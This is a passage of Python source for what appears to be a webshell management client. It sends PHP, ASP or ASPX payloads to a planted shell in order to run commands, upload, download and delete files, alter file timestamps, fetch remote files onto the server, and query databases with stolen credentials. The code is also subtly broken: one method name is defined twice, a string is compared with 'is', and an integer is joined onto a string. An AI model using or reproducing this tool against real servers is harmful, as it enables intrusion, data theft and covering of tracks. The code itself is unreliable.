def __init__(self, **kwargs):
super().__init__(**kwargs)
self.flag = CONF.get('FLAG', 'M@M')
self.k1 = CONF.get('K1', 'k1')
self.k2 = CONF.get('K2', 'k2')
self.k3 = CONF.get('K3', 'k3')
self.base = self.getbase()
def uploadfile(self, path, content):
pl = CONF.get('UPLOADFILE').get(self.type.upper()) % path
pl = pl.replace('#K1#', self.k1)
pl = pl.replace('#K2#', self.k2) if '#K2#' in pl else pl
params = self.generate(pl) + '&' + self.k1 + '=' + content
if self.type.lower() is 'asp':
params += '&' + self.k2 + '=' + len(content)
return self.POST(params)
def getbase(self):
pl = CONF.get(self.type.upper() + '_BASE', '')
if self.type.lower() == 'php':
pl = pl % 'action'
elif self.type.lower() == 'asp':
pl = pl % (self.flag, 'action', self.flag)
elif self.type.lower() == 'aspx':
pl = pl % (self.flag, 65001, 'action', self.flag)
# log.debug('Shell Base: %s' % pl)
return pl
def database(self, connstr):
if self.type.lower() == 'php':
dbtype, hst, usr, pwd, dbn, dbl, dbp = self.parse_connstr(connstr)
key = '_'.join(('DB_PHP', dbtype.upper(), 'DBLIST'))
if dbtype.upper() == 'MYSQL':
dbn = dbn or 'mysql'
dbl = dbl or 'utf-8'
pl = CONF.get(key) % (hst, usr, pwd, dbn, dbl)
elif dbtype.upper() == 'MSSQL':
pl = CONF.get(key) % (hst, usr, pwd, dbn)
elif dbtype.upper() in ('INFORMIX', 'ORACLE'):
pl = CONF.get(key) % (hst, usr, pwd)
elif dbtype.upper() == 'POSTGRESQL':
pl = CONF.get(key) % (hst, usr, pwd, dbn, dbp)
elif self.type.lower() in ('asp', 'aspx'):
conn = self.parse_ado(connstr)
pl = CONF.get('DB_' + self.type.upper() + '_ADO_DBLIST') % conn
params = self.generate(pl)
return self.POST(params)
def execute(self, connstr, sql, database=None):
if self.type.lower() == 'php':
dbtype, hst, usr, pwd, dbn, dbl, dbp = self.parse_connstr(connstr)
key = '_'.join(('DB_PHP', dbtype.upper(), 'EXECUTESQL'))
if dbtype.upper() == 'MYSQL':
dbn = database or dbn or 'mysql'
dbl = dbl or 'utf-8'
pl = CONF.get(key) % (hst, usr, pwd, dbn, sql, dbl)
elif dbtype.upper() in ('MSSQL', 'ORACLE'):
dbn = database or dbn
pl = CONF.get(key) % (hst, usr, pwd, dbn, sql)
elif dbtype.upper() == 'INFORMIX':
pl = CONF.get(key) % (hst, usr, pwd, sql)
elif dbtype.upper() == 'POSTGRESQL':
dbn = database or dbn
pl = CONF.get(key) % (hst, usr, pwd, dbn, dbp, sql)
elif self.type.lower() in ('asp', 'aspx'):
conn = self.parse_ado(connstr)
pl = CONF.get('DB_' + self.type.upper() +
'_ADO_EXECUTESQL') % (conn, sql)
params = self.generate(pl)
return self.POST(params)
def settime(self, fname, time):
pl = CONF.get('SETTIME').get(self.type.upper()) % (fname, time)
params = self.generate(pl)
return self.POST(params)
def wget(self, rpath, lpath):
pl = CONF.get('WGET').get(self.type.upper()) % (rpath, lpath)
params = self.generate(pl)
return self.POST(params)
def newfolder(self, name):
pl = CONF.get('NEWFOLDER').get(self.type.upper()) % name
params = self.generate(pl)
return self.POST(params)
def pastefile(self, src, dest):
pl = CONF.get('PASTEFILE').get(self.type.upper()) % (src, dest)
params = self.generate(pl)
return self.POST(params)
def downfile(self, path):
pl = CONF.get('DOWNFILE').get(self.type.upper()) % path
params = self.generate(pl)
return self.POST(params)
def savefile(self, path, content):
pl = CONF.get('SAVETXTFILE').get(self.type.upper()) % path
pl = pl.replace('#K1#', self.k1)
params = self.generate(pl) + '&' + self.k1 + '=' + content
return self.POST(params)
def showtxt(self, path):
pl = CONF.get('SHOWTXTFILE').get(self.type.upper()) % path
params = self.generate(pl)
return self.POST(params)
def execute(self, cmd_path, cmd):
pl = CONF.get('SHELL').get(self.type.upper()) % (cmd_path, cmd)
params = self.generate(pl)
return self.POST(params)
def getinfo(self):
pl = CONF.get('GETBASEINFO').get(self.type.upper())
params = self.generate(pl)
return self.POST(params)
def rename(self, src, dest):
pl = CONF.get('RENAME').get(self.type.upper()) % (src, dest)
params = self.generate(pl)
return self.POST(params)
def showfolder(self, path):
pl = CONF.get('SHOWFOLDER').get(self.type.upper()) % path
params = self.generate(pl)
return self.POST(params)
def deletefile(self, path):
pl = CONF.get('DELETEFILE').get(self.type.upper()) % path
params = self.generate(pl)
return self.POST(params)